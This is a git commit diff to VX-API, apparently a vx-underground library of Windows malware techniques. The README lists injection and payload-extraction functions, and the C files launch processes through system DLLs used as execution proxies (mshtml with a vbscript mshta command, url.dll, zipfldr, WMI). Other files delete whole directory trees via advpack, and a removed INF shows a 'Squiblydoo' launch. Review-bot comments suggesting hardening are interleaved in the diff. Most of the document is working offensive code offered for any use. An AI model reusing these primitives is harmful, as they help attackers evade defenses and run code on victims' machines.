parent
f2f28f9a55
commit
1620dd9894
11
README.md
11
README.md
|
@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
|
|||
|
||||
# VX-API
|
||||
|
||||
Version: 2.0.684
|
||||
Version: 2.0.709
|
||||
|
||||
Developer: smelly__vx
|
||||
|
||||
|
@ -92,6 +92,8 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| XpressMaximumDecompressBuffer | smelly__vx |
|
||||
| XpressStandardCompressBuffer | smelly__vx |
|
||||
| XpressStandardDecompressBuffer | smelly__vx |
|
||||
| MpfExtractMaliciousPayloadFromZipFileNoPassword | Codu |
|
||||
| ExtractFilesFromCabIntoTarget | smelly__vx |
|
||||
|
||||
|
||||
## Error Handling
|
||||
|
@ -137,6 +139,7 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| GetPidFromPidBruteForcing | modexp |
|
||||
| GetPidFromNtQueryFileInformation | modexp, Lloyd Davies, Jonas Lyk |
|
||||
| GetPidFromPidBruteForcingExW | smelly__vx, LLoyd Davies, Jonas Lyk, modexp |
|
||||
| IsProcessRunningAsAdmin2 | smelly__vx |
|
||||
|
||||
|
||||
## Helper Functions
|
||||
|
@ -144,7 +147,6 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| ------------- | --------------- |
|
||||
| CreateLocalAppDataObjectPath | smelly__vx |
|
||||
| CreateWindowsObjectPath | smelly__vx |
|
||||
| DeleteFileWithCreateFileFlag | smelly__vx |
|
||||
| GetCurrentDirectoryFromUserProcessParameters | smelly__vx |
|
||||
| GetCurrentProcessIdFromTeb | ReactOS |
|
||||
| GetCurrentUserSid | Giovanni Dicanio |
|
||||
|
@ -212,9 +214,7 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| MpfGetLsaPidFromRegistry | modexp |
|
||||
| MpfGetLsaPidFromNamedPipe | modexp |
|
||||
| MpfComMonitorChromeSessionOnce | smelly__vx |
|
||||
| MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc | aaaddress1 |
|
||||
| MpfLolExecuteRemoteBinaryByAppInstaller | Wade Hickey |
|
||||
| MpfExtractMaliciousPayloadFromZipFileNoPassword | Codu |
|
||||
| MpfPiControlInjection | SafeBreach Labs |
|
||||
| MpfPiQueueUserAPCViaAtomBomb | SafeBreach Labs |
|
||||
| MpfPiWriteProcessMemoryCreateRemoteThread | SafeBreach Labs |
|
||||
|
@ -294,6 +294,8 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| ------------- | --------------- |
|
||||
| CopyFileViaSetupCopyFile | smelly__vx |
|
||||
| CreateFileFromDsCopyFromSharedFile | Jonas Lyk |
|
||||
| DeleteDirectoryAndSubDataViaDelNode | smelly__vx |
|
||||
| DeleteFileWithCreateFileFlag | smelly__vx |
|
||||
|
||||
|
||||
## Process Creation
|
||||
|
@ -314,6 +316,7 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| CreateProcessFromPcwUtil | smelly__vx |
|
||||
| CreateProcessFromShdocVwOpenUrl | smelly__vx |
|
||||
| CreateProcessFromShell32ShellExecRun | smelly__vx |
|
||||
| MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc | aaaddress1 |
|
||||
|
||||
|
||||
## Rad98 Hooking Engine
|
||||
|
|
|
@ -24,4 +24,5 @@ PWCHAR CaplockStringW(_In_ PWCHAR Ptr)
|
|||
sv++;
|
||||
}
|
||||
return Ptr;
|
||||
}
|
||||
}
|
||||
|
||||
|
|
|
@ -5,6 +5,7 @@ BOOL CopyFileViaSetupCopyFileW(LPCWSTR Source, LPCWSTR Destination)
|
|||
return SetupDecompressOrCopyFileW(Source, Destination, FILE_COMPRESSION_NONE);
|
||||
}
|
||||
|
||||
|
||||
BOOL CopyFileViaSetupCopyFileA(LPCSTR Source, LPCSTR Destination)
|
||||
{
|
||||
WCHAR wSource[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
|
|
|
@ -1,53 +0,0 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
/*
|
||||
|
||||
Example .inf file
|
||||
_______________
|
||||
///////////////
|
||||
‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾
|
||||
; ----------------------------------------------------------------------
|
||||
; Required Sections
|
||||
; ----------------------------------------------------------------------
|
||||
[Version]
|
||||
Signature=$CHICAGO$
|
||||
Provider=test
|
||||
Class=Printer
|
||||
|
||||
[Manufacturer]
|
||||
HuntressLabs=ModelsSection,NTx86,NTia64,NTamd64
|
||||
|
||||
; ----------------------------------------------------------------------
|
||||
; Models Section
|
||||
; ----------------------------------------------------------------------
|
||||
[ModelsSection.NTx86]
|
||||
UnregisterDlls = Squiblydoo
|
||||
|
||||
[ModelsSection.NTia64]
|
||||
UnregisterDlls = Squiblydoo
|
||||
|
||||
[ModelsSection.NTamd64]
|
||||
UnregisterDlls = Squiblydoo
|
||||
|
||||
; ----------------------------------------------------------------------
|
||||
; Support Sections
|
||||
; ----------------------------------------------------------------------
|
||||
[DefaultInstall]
|
||||
UnregisterDlls = Squiblydoo
|
||||
|
||||
[Squiblydoo]
|
||||
calc.exe
|
||||
_______________
|
||||
///////////////
|
||||
‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾
|
||||
*/
|
||||
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCab3W(LPCWSTR PathToInfFile, LPCWSTR NameOfSection)
|
||||
{
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
BOOL CreateProcessFromINFSectionInstallStringNoCab3A(LPCSTR PathToInfFile, LPCSTR NameOfSection)
|
||||
{
|
||||
return FALSE;
|
||||
}
|
|
@ -0,0 +1,43 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
//CreateProcessFromMsHTMLW(L"vbscript:CreateObject(\"WScript.Shell\").Run(\"calc.exe\",0)(Window.Close)")
|
||||
//CreateProcessFromMsHTMLW(L"\"javascript:close((V=(v=new ActiveXObject('SAPI.SpVoice')).GetVoices()).count&&v.Speak('Hello! I am '+V(0).GetAttribute('Gender')))\"");
|
||||
|
||||
|
||||
BOOL CreateProcessFromMsHTMLW(LPCWSTR MshtaCommand)
|
||||
{
|
||||
typedef HRESULT(WINAPI* RUNHTMLAPPLICATION)(HINSTANCE, HINSTANCE, LPSTR, INT);
|
||||
RUNHTMLAPPLICATION RunHtmlApplication = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
WCHAR wBinaryBuffer[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
WCHAR Payload[MAX_PATH * sizeof(WCHAR) * 2] = { 0 };
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
if (GetProcessPathFromLoaderLoadModuleW(MAX_PATH * sizeof(WCHAR), wBinaryBuffer) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
StringConcatW(Payload, L"\"");
|
||||
StringConcatW(Payload, wBinaryBuffer);
|
||||
StringConcatW(Payload, L"\"");
|
||||
StringConcatW(Payload, L" ");
|
||||
StringConcatW(Payload, MshtaCommand);
|
||||
|
||||
if (!RtlSetBaseUnicodeCommandLine(Payload))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hMod = LoadLibraryW(L"mshtml.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
RunHtmlApplication = (RUNHTMLAPPLICATION)GetProcAddressA((DWORD64)hMod, "RunHTMLApplication");
|
||||
if (!RunHtmlApplication)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
RunHtmlApplication(NULL, NULL, NULL, 0);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
return bFlag;
|
||||
}
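Review bot: The StringConcatW calls that build `Payload` (quote, module path, quote, space, `MshtaCommand`) take no destination size, so unless StringConcatW bounds internally a long `MshtaCommand` overruns the fixed stack array; add a bound before the first concatenation, e.g. `if (StringLengthW(wBinaryBuffer) + StringLengthW(MshtaCommand) + 4 > sizeof(Payload) / sizeof(Payload[0])) goto EXIT_ROUTINE;`. The `hMod` from `LoadLibraryW(L"mshtml.dll")` is never released, unlike the sibling files in this commit that call `FreeLibrary(hMod)` at EXIT_ROUTINE; once RunHtmlApplication has returned it can be freed the same way. The HRESULT from `RunHtmlApplication(NULL, NULL, NULL, 0)` is discarded and `bFlag` becomes TRUE unconditionally, so callers cannot tell whether the application ran; `if (FAILED(RunHtmlApplication(NULL, NULL, NULL, 0))) goto EXIT_ROUTINE;` would report it. `WCHAR Payload[MAX_PATH * sizeof(WCHAR) * 2]` multiplies an element count by sizeof(WCHAR), which gives twice the intended number of characters and is worth a clarifying comment or a plain count.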
|
|
@ -30,6 +30,7 @@ EXIT_ROUTINE:
|
|||
|
||||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL CreateProcessFromShdocVwOpenUrlA(LPCSTR PathToUrlFile)
|
||||
{
|
||||
typedef VOID(WINAPI* OPENURL)(HWND, HINSTANCE, LPCSTR);
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL CreateProcessFromShell32ShellExecRunDllW(LPCWSTR PathToFile)
|
||||
BOOL CreateProcessFromShell32ShellExecRunW(LPCWSTR PathToFile)
|
||||
{
|
||||
typedef VOID(WINAPI* SHELLEXEC_RUNDLLW)(HWND, HINSTANCE, LPCWSTR, INT);
|
||||
SHELLEXEC_RUNDLLW ShellExec_RunDllW = NULL;
|
||||
|
@ -25,7 +25,7 @@ EXIT_ROUTINE:
|
|||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL CreateProcessFromShell32ShellExecRunDllA(LPCSTR PathToFile)
|
||||
BOOL CreateProcessFromShell32ShellExecRunA(LPCSTR PathToFile)
|
||||
{
|
||||
typedef VOID(WINAPI* SHELLEXEC_RUNDLLA)(HWND, HINSTANCE, LPCSTR, INT);
|
||||
SHELLEXEC_RUNDLLA ShellExec_RunDllA = NULL;
|
|
@ -0,0 +1,59 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL CreateProcessFromUrlFileProtocolHandlerW(LPCWSTR PathToUrlFile)
|
||||
{
|
||||
typedef HINSTANCE(WINAPI* FILEPROTOCOLHANDLERA)(HWND, HINSTANCE, LPCSTR, INT);
|
||||
FILEPROTOCOLHANDLERA FileProtocolHandlerA = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
CHAR ccPathToUrlFile[MAX_PATH] = { 0 };
|
||||
|
||||
if (WCharStringToCharString(ccPathToUrlFile, (PWCHAR)PathToUrlFile, StringLengthW(PathToUrlFile)) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hMod = LoadLibraryW(L"url.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
FileProtocolHandlerA = (FILEPROTOCOLHANDLERA)GetProcAddressA((DWORD64)hMod, "FileProtocolHandlerA");
|
||||
if (!FileProtocolHandlerA)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
FileProtocolHandlerA(NULL, NULL, ccPathToUrlFile, SW_SHOW);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL CreateProcessFromUrlFileProtocolHandlerA(LPCSTR PathToUrlFile)
|
||||
{
|
||||
typedef HINSTANCE(WINAPI* FILEPROTOCOLHANDLERA)(HWND, HINSTANCE, LPCSTR, INT);
|
||||
FILEPROTOCOLHANDLERA FileProtocolHandlerA = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hMod = LoadLibraryW(L"url.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
FileProtocolHandlerA = (FILEPROTOCOLHANDLERA)GetProcAddressA((DWORD64)hMod, "FileProtocolHandlerA");
|
||||
if (!FileProtocolHandlerA)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
FileProtocolHandlerA(NULL, NULL, PathToUrlFile, SW_SHOW);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
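Review bot: In the W variant, `WCharStringToCharString(ccPathToUrlFile, (PWCHAR)PathToUrlFile, StringLengthW(PathToUrlFile))` passes the source length as the third argument, which the StringManipulation.h prototype names `MaximumAllowed`; if that parameter bounds the destination, as the name suggests, a path longer than MAX_PATH-1 overruns the MAX_PATH-byte `ccPathToUrlFile`, so the bound should be the destination capacity, e.g. `sizeof(ccPathToUrlFile) - 1`. The same call shape appears in CreateProcessFromUrlOpenUrlW and CreateProcessFromZipfldrRouteCallW, and with CharStringToWCharString in DeleteDirectoryAndSubDataViaDelNodeA, ExtractFilesFromCabIntoTargetA, IeCreateFileA and RtlSetBaseUnicodeCommandLine. The `HINSTANCE` returned by `FileProtocolHandlerA` is discarded in both variants, so `bFlag` is TRUE whenever the export resolves; if the handler follows the ShellExecute convention of returning a value of 32 or less on failure, that is worth checking rather than assuming, and either way a comment should say that TRUE means "handler was invoked", not "file was opened".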
|
|
@ -0,0 +1,59 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL CreateProcessFromUrlOpenUrlW(LPCWSTR PathToUrlFile)
|
||||
{
|
||||
typedef VOID(WINAPI* OPENURL)(HWND, HINSTANCE, LPCSTR);
|
||||
OPENURL OpenUrl = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
CHAR ccPathToUrlFile[MAX_PATH] = { 0 };
|
||||
|
||||
if (WCharStringToCharString(ccPathToUrlFile, (PWCHAR)PathToUrlFile, StringLengthW(PathToUrlFile)) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hMod = LoadLibraryW(L"url.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
OpenUrl = (OPENURL)GetProcAddressA((DWORD64)hMod, "OpenURL");
|
||||
if (!OpenUrl)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
OpenUrl(NULL, NULL, ccPathToUrlFile);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL CreateProcessFromUrlOpenUrlA(LPCSTR PathToUrlFile)
|
||||
{
|
||||
typedef VOID(WINAPI* OPENURL)(HWND, HINSTANCE, LPCSTR);
|
||||
OPENURL OpenUrl = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hMod = LoadLibraryW(L"url.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
OpenUrl = (OPENURL)GetProcAddressA((DWORD64)hMod, "OpenUrl");
|
||||
if (!OpenUrl)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
OpenUrl(NULL, NULL, PathToUrlFile);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
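Review bot: The export name differs between the two variants: the W variant resolves `"OpenURL"` while the A variant resolves `"OpenUrl"`, and GetProcAddress-style lookup is case-sensitive, so only one spelling can match url.dll and the other variant will always fall through to EXIT_ROUTINE with FALSE. Make both use the W variant's `"OpenURL"` spelling, or route both through one shared lookup so the name exists in a single place. The `OPENURL` typedef declares a VOID return, so no failure from the handler can be reported and `bFlag` is TRUE whenever the export resolves; a one-line comment stating that TRUE means the call was made, not that the URL file was opened, would help callers.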
|
|
@ -0,0 +1,115 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD CreateProcessFromWmiWin32_ProcessW(LPCWSTR BinaryPath)
|
||||
{
|
||||
HRESULT Result;
|
||||
IWbemLocator* Locator = NULL;
|
||||
IWbemServices* Services = NULL;
|
||||
IWbemClassObject* Win32ProcessStartupObject = NULL;
|
||||
IWbemClassObject* StartupInstance = NULL;
|
||||
IWbemClassObject* Win32ProcessObject = NULL;
|
||||
IWbemClassObject* ParameterInformationObject = NULL;
|
||||
IWbemClassObject* ParametersObject = NULL;
|
||||
IWbemClassObject* StartupResponseObject = NULL;
|
||||
VARIANT varCommand;
|
||||
VARIANT vtDispatch;
|
||||
|
||||
BOOL bFlag = FALSE;
|
||||
DWORD dwError = ERROR_SUCCESS;
|
||||
|
||||
Result = CoInitializeEx(0, COINIT_MULTITHREADED);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = CoCreateInstance(CLSID_WbemLocator, NULL, 1, IID_IWbemLocator, (LPVOID*)&Locator);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = Locator->ConnectServer((BSTR)L"ROOT\\CIMV2", NULL, NULL, 0, NULL, 0, 0, &Services);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = CoSetProxyBlanket(Services, RPC_C_AUTHN_WINNT, RPC_C_AUTHZ_NONE, NULL, RPC_C_AUTHN_LEVEL_CALL, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = Services->GetObjectW((BSTR)L"Win32_ProcessStartup", 0, NULL, &Win32ProcessStartupObject, NULL);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = Win32ProcessStartupObject->SpawnInstance(0, &StartupInstance);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = Services->GetObjectW((BSTR)L"Win32_Process", 0, NULL, &Win32ProcessObject, NULL);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = Win32ProcessObject->GetMethod((BSTR)L"Create", 0, &ParameterInformationObject, NULL);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = ParameterInformationObject->SpawnInstance(0, &ParametersObject);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
VariantInit(&varCommand);
|
||||
varCommand.vt = VT_BSTR;
|
||||
varCommand.bstrVal = (BSTR)BinaryPath;
|
||||
|
||||
Result = ParametersObject->Put((BSTR)L"CommandLine", 0, &varCommand, 0);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
VariantInit(&vtDispatch);
|
||||
vtDispatch.vt = VT_DISPATCH;
|
||||
vtDispatch.byref = StartupInstance;
|
||||
|
||||
Result = ParametersObject->Put((BSTR)L"ProcessStartupInformation", 0, &vtDispatch, 0);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Result = Services->ExecMethod((BSTR)L"Win32_Process", (BSTR)L"Create", 0, NULL, ParametersObject, &StartupResponseObject, NULL);
|
||||
if (!SUCCEEDED(Result))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (!bFlag)
|
||||
{
|
||||
if (Result != S_OK)
|
||||
dwError = Win32FromHResult(Result);
|
||||
else
|
||||
dwError = GetLastErrorFromTeb();
|
||||
}
|
||||
|
||||
if (Locator)
|
||||
Locator->Release();
|
||||
|
||||
if (Services)
|
||||
Services->Release();
|
||||
|
||||
if (Win32ProcessStartupObject)
|
||||
Win32ProcessStartupObject->Release();
|
||||
|
||||
if (StartupInstance)
|
||||
StartupInstance->Release();
|
||||
|
||||
if (Win32ProcessObject)
|
||||
Win32ProcessObject->Release();
|
||||
|
||||
if (ParameterInformationObject)
|
||||
ParameterInformationObject->Release();
|
||||
|
||||
if (ParametersObject)
|
||||
ParametersObject->Release();
|
||||
|
||||
if (StartupResponseObject)
|
||||
StartupResponseObject->Release();
|
||||
|
||||
CoUninitialize();
|
||||
|
||||
return dwError;
|
||||
}
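Review bot: `CoUninitialize()` at EXIT_ROUTINE runs even when `CoInitializeEx` failed (for example RPC_E_CHANGED_MODE on a thread already initialised as STA), which unbalances the caller's COM initialisation count; track the result in a flag, e.g. `BOOL bComInit = FALSE;` set to TRUE right after the `CoInitializeEx` check, and close with `if (bComInit) CoUninitialize();`. `varCommand.bstrVal = (BSTR)BinaryPath` stores a plain wide string where a length-prefixed BSTR is expected, so if WMI reads the length through SysStringLen the value is wrong; `SysAllocString(BinaryPath)` plus `VariantClear(&varCommand)` at exit is the safe form, and the same question applies to `vtDispatch.byref = StartupInstance`, which should be confirmed against the WMI contract. The literal `1` in `CoCreateInstance(CLSID_WbemLocator, NULL, 1, ...)` is the CLSCTX_INPROC_SERVER value; the named constant reads better.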
|
|
@ -0,0 +1,59 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL CreateProcessFromZipfldrRouteCallW(LPCWSTR PathToFile)
|
||||
{
|
||||
typedef VOID(WINAPI* ROUTETHECALL)(HWND, HINSTANCE, LPCSTR);
|
||||
ROUTETHECALL RouteTheCall = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
CHAR ccPath[MAX_PATH] = { 0 };
|
||||
|
||||
hMod = LoadLibraryW(L"zipfldr.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (WCharStringToCharString(ccPath, (PWCHAR)PathToFile, StringLengthW(PathToFile)) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
RouteTheCall = (ROUTETHECALL)GetProcAddressA((DWORD64)hMod, "RouteTheCall");
|
||||
if (!RouteTheCall)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
RouteTheCall(NULL, NULL, ccPath);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL CreateProcessFromZipfldrRouteCallA(LPCSTR PathToFile)
|
||||
{
|
||||
typedef VOID(WINAPI* ROUTETHECALL)(HWND, HINSTANCE, LPCSTR);
|
||||
ROUTETHECALL RouteTheCall = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hMod = LoadLibraryW(L"zipfldr.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
RouteTheCall = (ROUTETHECALL)GetProcAddressA((DWORD64)hMod, "RouteTheCall");
|
||||
if (!RouteTheCall)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
RouteTheCall(NULL, NULL, PathToFile);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
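Review bot: `WCharStringToCharString(...) == NULL` in the W variant compares a SIZE_T return against the null-pointer constant; the sibling files added in this commit (CreateProcessFromUrlOpenUrlW, CreateProcessFromUrlFileProtocolHandlerW) write `== 0`, which is the form to use here for consistency and to avoid a pointer/integer comparison warning. Unlike those siblings this variant loads zipfldr.dll before converting the path, so a conversion failure still pays for a LoadLibrary/FreeLibrary pair; moving the conversion above `LoadLibraryW` matches the others. `ROUTETHECALL` is declared VOID, so the outcome of RouteTheCall cannot be reported and TRUE only means the export was invoked; a comment saying so would prevent callers from treating TRUE as "file opened".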
|
|
@ -0,0 +1,61 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL DeleteDirectoryAndSubDataViaDelNodeW(LPCWSTR FullPathToDirectory)
|
||||
{
|
||||
DELNODEW DelNodeW = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hMod = LoadLibraryW(L"advpack.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
DelNodeW = (DELNODEW)GetProcAddressA((DWORD64)hMod, "DelNodeW");
|
||||
if (!DelNodeW)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!SUCCEEDED(DelNodeW(FullPathToDirectory, 0)))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL DeleteDirectoryAndSubDataViaDelNodeA(LPCSTR FullPathToDirectory)
|
||||
{
|
||||
DELNODEW DelNodeW = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
WCHAR ccBuffer[MAX_PATH * sizeof(WCHAR)] = {0};
|
||||
|
||||
if(CharStringToWCharString(ccBuffer, (PCHAR)FullPathToDirectory, StringLengthA(FullPathToDirectory)) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hMod = LoadLibraryW(L"advpack.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
DelNodeW = (DELNODEW)GetProcAddressA((DWORD64)hMod, "DelNodeW");
|
||||
if (!DelNodeW)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!SUCCEEDED(DelNodeW(ccBuffer, 0)))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
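Review bot: `WCHAR ccBuffer[MAX_PATH * sizeof(WCHAR)]` in the A variant declares MAX_PATH*2 wide characters, since the element count of a WCHAR array is already in characters; the intent reads as MAX_PATH characters, so `WCHAR ccBuffer[MAX_PATH] = { 0 };` with the conversion bound derived from it is clearer, and the same pattern appears in ExtractFilesFromCabIntoTargetA and IeCreateFileA. DelNodeW with flags 0 removes the directory and everything beneath it, and the function returns FALSE both when advpack.dll cannot be loaded and when the deletion HRESULT fails; a header comment stating that the removal is recursive and irreversible, and that FALSE does not distinguish "not attempted" from "failed", would help callers.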
|
|
@ -0,0 +1,64 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL ExtractFilesFromCabIntoTargetW(LPCWSTR CabFile, LPCWSTR OutputDirectory)
|
||||
{
|
||||
EXTRACTFILESW ExtractFilesW = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hMod = LoadLibraryW(L"advpack.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ExtractFilesW = (EXTRACTFILESW)GetProcAddressA((DWORD64)hMod, "ExtractFilesW");
|
||||
if (!ExtractFilesW)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!SUCCEEDED(ExtractFilesW(CabFile, OutputDirectory, 0, NULL, NULL, 0)))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL ExtractFilesFromCabIntoTargetA(LPCSTR CabFile, LPCSTR OutputDirectory)
|
||||
{
|
||||
EXTRACTFILESW ExtractFilesW = NULL;
|
||||
HMODULE hMod = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
WCHAR ccCab[MAX_PATH * sizeof(WCHAR)] = {0};
|
||||
WCHAR ccOut[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
|
||||
if (CharStringToWCharString(ccCab, (PCHAR)CabFile, StringLengthA(CabFile)) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (CharStringToWCharString(ccOut, (PCHAR)OutputDirectory, StringLengthA(OutputDirectory)) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hMod = LoadLibraryW(L"advpack.dll");
|
||||
if (hMod == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ExtractFilesW = (EXTRACTFILESW)GetProcAddressA((DWORD64)hMod, "ExtractFilesW");
|
||||
if (!ExtractFilesW)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!SUCCEEDED(ExtractFilesW(ccCab, ccOut, 0, NULL, NULL, 0)))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hMod)
|
||||
FreeLibrary(hMod);
|
||||
|
||||
return bFlag;
|
||||
}
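Review bot: The `ExtractFilesW(CabFile, OutputDirectory, 0, NULL, NULL, 0)` call carries no explanation of its arguments; a comment such as `// NULL file list extracts every member of the cabinet; dwFlags, pvReserved and dwReserved are reserved and must be 0` would spare the next reader a trip to the advpack documentation. Both variants collapse three distinct failures (advpack.dll not loadable, export missing, extraction HRESULT failed) into FALSE and drop the HRESULT; either document that in a header comment or return a DWORD error the way CreateProcessFromWmiWin32_ProcessW in this commit does.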
|
|
@ -83,7 +83,15 @@ typedef NTSTATUS(NTAPI* SYSTEMFUNCTION032)(PAB_STRING, PAB_STRING);
|
|||
|
||||
